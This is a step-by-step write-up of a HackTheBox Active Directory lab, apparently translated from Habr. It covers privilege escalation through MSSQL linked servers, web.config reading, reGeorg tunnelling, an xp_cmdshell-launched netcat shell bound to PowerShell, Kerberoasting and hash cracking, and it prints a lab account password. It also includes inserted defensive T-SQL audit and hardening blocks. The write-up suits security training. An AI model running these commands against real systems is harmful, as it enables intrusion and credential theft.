In this article we will walk through not just a single machine but a small lab from the HackTheBox site.
As stated in the description, POO is designed to test skills at all stages of an attack in a small Active Directory environment. The goal is to compromise the accessible host, escalate privileges and finally compromise the whole domain, collecting 5 flags along the way.
The connection to the lab is made over VPN. It is recommended not to connect from a work computer or from a host holding data that matters to you, since you are joining a private network together with people who know a thing or two about information security :)
Organizational information
To keep you informed about new articles, software and other information, I have created
All information is provided for educational purposes only. The author of this document takes no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained from studying this document.
Intro
In total, this lab has two machines and 5 flags.
A description and the address of the accessible host are also provided.
Let's begin!
Recon flag
This machine has the IP address 10.13.38.11, which I add to /etc/hosts.
10.13.38.11 poo.htb
The first step is scanning for open ports. Since scanning all ports with nmap takes a long time, I first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at 500 pps.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Now, to get detailed information about the services running on those ports, let's scan them with the -A option.
nmap -A poo.htb -p80,1433
So we have IIS and MSSQL services. Along the way we learn the real DNS name of the domain and of the computer. On the web server we are greeted by the IIS default page.
Let's enumerate directories. I use gobuster for this. In the parameters we specify the number of threads, 128 (-t), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
So we have HTTP authentication on the /admin directory, and an accessible .DS_Store file, the storage file of the macOS desktop service. .DS_Store files hold a user's settings for a folder, such as the list of files, icon positions and the chosen background image. Such a file can end up in a web developer's web server directory, and from it we get information about the directory contents. For this you can use
python3 dsstore_crawler.py -i http://poo.htb/
We get the directory contents. The most interesting thing here is the /dev directory, where we can see source and db files in two branches. But we can learn the first 6 characters of file and directory names if the service is vulnerable to the IIS ShortName issue. You can check for this vulnerability using
And we find one text file starting with "poo_co". Not knowing what to do next, I simply picked out of the wordlist all words starting with "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
And enumerate again with wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
And we find the right word! We look at this file and save the credentials (judging by the DBNAME parameter, they are for MSSQL).
We submit the flag and move on, at 20%.
Huh flag
We connect to MSSQL; I use DBeaver.
Finding nothing interesting in this database, let's open the SQL Editor and check which users exist.
SELECT name FROM master..syslogins;
We have two users. Let's check our privileges.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
So, no privileges. Let's look at the linked servers; I wrote about this technique in detail
SELECT * FROM master..sysservers;
So we find another SQL Server. Let's check query execution on this server using openquery().
SELECT version FROM openquery("COMPATIBILITY\POO_CONFIG", 'select @@version as version');
We can also build a chain of nested queries.
SELECT version FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITY\POO_PUBLIC", ''select @@version as version'');');
The point is that when we query a linked server, the query is executed on behalf of a different user! Let's see which user context we are working in on the linked server.
SELECT name FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT user_name() as name');
And now let's see in which context a query coming from the linked server back to our own server is executed!
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT user_name() as name'');');
So it is the dbo context, which should have all privileges. Let's check the privileges for a query that arrives from the linked server.
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
As you can see, we have all privileges! Let's create our own admin. But since this isn't allowed directly, we do it via EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
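The behaviour exploited above (queries sent through a linked server run as whatever remote login the link is mapped to, and a link pointing back runs as dbo) is something a DBA can inventory. The following T-SQL is an added audit example, not code from the write-up; it assumes the instance names COMPATIBILITY\POO_CONFIG and COMPATIBILITY\POO_PUBLIC from the lab and should be run on each instance that defines linked servers. It lists every linked-server login mapping and singles out the pattern used here: a default mapping for all logins onto a fixed remote account.

```sql
-- Added audit example (not part of the original write-up).
-- Run on each instance that defines linked servers, e.g. POO_PUBLIC and POO_CONFIG.
-- Lists who can use each link and which remote login the connection uses.
SELECT
    s.name                      AS linked_server,
    s.data_source,
    s.is_rpc_out_enabled,       -- 1 = EXECUTE (...) AT <server> is allowed
    s.is_data_access_enabled,   -- 1 = OPENQUERY / four-part names are allowed
    CASE WHEN ll.local_principal_id = 0 THEN N'<all other logins>'
         ELSE sp.name END       AS local_login,
    CASE WHEN ll.uses_self_credential = 1 THEN N'<caller''s own credentials>'
         WHEN ll.remote_name IS NULL    THEN N'<no login supplied>'
         ELSE ll.remote_name END AS remote_login
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
  ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
  ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Finding to act on: a default mapping (local_principal_id = 0) onto a named
-- remote account means every login on this instance, including a low-privilege
-- one such as the web application's account, reaches the remote server as that
-- account. This is what let an unprivileged login obtain sysadmin above.
SELECT s.name AS linked_server, ll.remote_name
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
  AND ll.local_principal_id = 0
  AND ll.uses_self_credential = 0
  AND ll.remote_name IS NOT NULL;

-- On the remote instance, compare those remote_name values with its sysadmins:
SELECT name
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- Remediation (documented procedure, shown commented out for one link, assumed
-- name): replace the default mapping with "no login", so unmapped callers cannot
-- connect, then add explicit least-privilege mappings only for logins that need it.
-- EXEC sp_addlinkedsrvlogin @rmtsrvname = N'COMPATIBILITY\POO_CONFIG',
--      @useself = 'FALSE', @locallogin = NULL, @rmtuser = NULL, @rmtpassword = NULL;
```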
And now we connect with the new user's credentials; note the new database.
We submit this flag and move on.
BackTrack flag
Let's get a shell via MSSQL; I use mssqlclient from the impacket package.
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC
We need to find passwords, and the first thing we have already come across is the website. So we need the web server config (getting a proper shell out won't work, a firewall is evidently in place).
But access is denied. Although we can read files from MSSQL, we first need to know which programming languages are configured. And in the MSSQL directory we find that Python is installed.
Now reading the web.config file is no problem.
EXEC sp_execute_external_script
    @language = N'Python',
    @script = N'print(open(r"C:\inetpub\wwwroot\web.config").read())';
With the obtained credentials, go to /admin and take the flag.
Foothold flag
Actually, there are some restrictions imposed by the firewall, but looking at the network settings we notice that IPv6 is also in use!
Add this address to /etc/hosts.
dead:babe::1001 poo6.htb
Let's scan the host again, but this time over IPv6.
And the WinRM service is reachable over IPv6. Let's connect with the credentials we obtained.
There is a flag on this computer; submit it.
P00ned flag
After reconnaissance on the host and
setspn.exe -T intranet.poo -Q */*
Let's execute the command via MSSQL.
This way we find the SPNs of the users p00_hr and p00_adm, which means they are vulnerable to a Kerberoasting attack. In short, we can get their password hashes.
First you need a stable shell in the context of the MSSQL user. But since we have limited access, we only have connectivity to the host on ports 80 and 1433. However, it is possible to tunnel traffic through port 80! For this we use
But when we try to access it, we get a 404 error. This means *.aspx files are not being executed. To make files with these resources run, install ASP.NET 4.5 as follows.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
And now, when we access tunnel.aspx, we get a response that everything is ready to go.
Let's start the client part of the application, which will route the traffic. We will forward all traffic from port 5432 to the server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
And we use proxychains to send any application's traffic through our proxy. Let's add this proxy to /etc/proxychains.conf.
Now let's upload the program to the server
Now, via MSSQL, we start a listener.
xp_cmdshell C:\temp\nc64.exe -e powershell.exe -lvp 4321
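Both the web.config read through sp_execute_external_script earlier and the listener started through xp_cmdshell here rely on instance options that are off by default. The T-SQL below is an added hardening check, not code from the write-up; it shows what a DBA would look at on an instance like POO_PUBLIC to find out whether either path is open and to close it.

```sql
-- Added hardening check (not part of the original write-up).
-- Both file reads via sp_execute_external_script (Python) and command
-- execution via xp_cmdshell depend on instance options that are off by default.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN (N'external scripts enabled', N'xp_cmdshell',
               N'Ad Hoc Distributed Queries', N'clr enabled');

-- Who may run external scripts in the current database: sp_execute_external_script
-- needs EXECUTE ANY EXTERNAL SCRIPT (sysadmin has it implicitly). Note that the
-- script itself runs under the Launchpad worker accounts, not the caller, so the
-- directories those accounts can read (here: the IIS web root) matter as well.
SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr
  ON pr.principal_id = pe.grantee_principal_id
WHERE pe.permission_name = N'EXECUTE ANY EXTERNAL SCRIPT';

-- Is a proxy account configured that lets non-sysadmin logins use xp_cmdshell?
SELECT name, credential_identity
FROM sys.credentials
WHERE name = N'##xp_cmdshell_proxy_account##';

-- Turn both features off where they are not needed. 'external scripts enabled'
-- may additionally require a restart of the SQL Server service to take effect.
EXEC sp_configure N'show advanced options', 1;    RECONFIGURE;
EXEC sp_configure N'xp_cmdshell', 0;              RECONFIGURE;
EXEC sp_configure N'external scripts enabled', 0; RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;    RECONFIGURE;
```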
And we connect through our proxy.
proxychains rlwrap nc poo.htb 4321
And we get the hashes.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Next, these hashes need to be cracked. Since rockyou did not contain the passwords, I used ALL the password wordlists shipped in SecLists. For cracking we use hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
And we get both passwords, the first from the Dutch_passwordlist.txt wordlist and the second from Keyboard-Combinations.txt.
So we now have three users; let's go to the domain controller. First let's find its address.
Great, we learned the domain controller's IP address. Let's find all the domain users and which of them is an administrator. Download the PowerView.ps1 script to gather the information. Now we connect using evil-winrm, specifying the directory containing the script in the -s parameter. Then just import the PowerView script.
Now all of its functions are available to us. The user p00_adm looks like a privileged user, so we will work in its context. Let's create a PSCredential object for this user.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Now all PowerShell commands in which we pass Creds will be executed on behalf of p00_adm. Let's list the users along with the AdminCount attribute.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
So our user is highly privileged. Let's see which groups it belongs to.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Finally we confirm that the user is a domain administrator. That grants the right to log in to the domain controller remotely. Let's try to log in via WinRM using our tunnel. I was thrown by the errors reGeorg produced when used with evil-winrm.
So we use another, simpler one,
We try to connect, and we are in the system.
But there is no flag. Then we look at the users and check their desktops.
On mr3ks we find the flag, and the lab is completed at 100%.
That's all. As feedback, comment on whether you learned something new from this article and whether it was useful to you.
You can join us at
Source: www.habr.com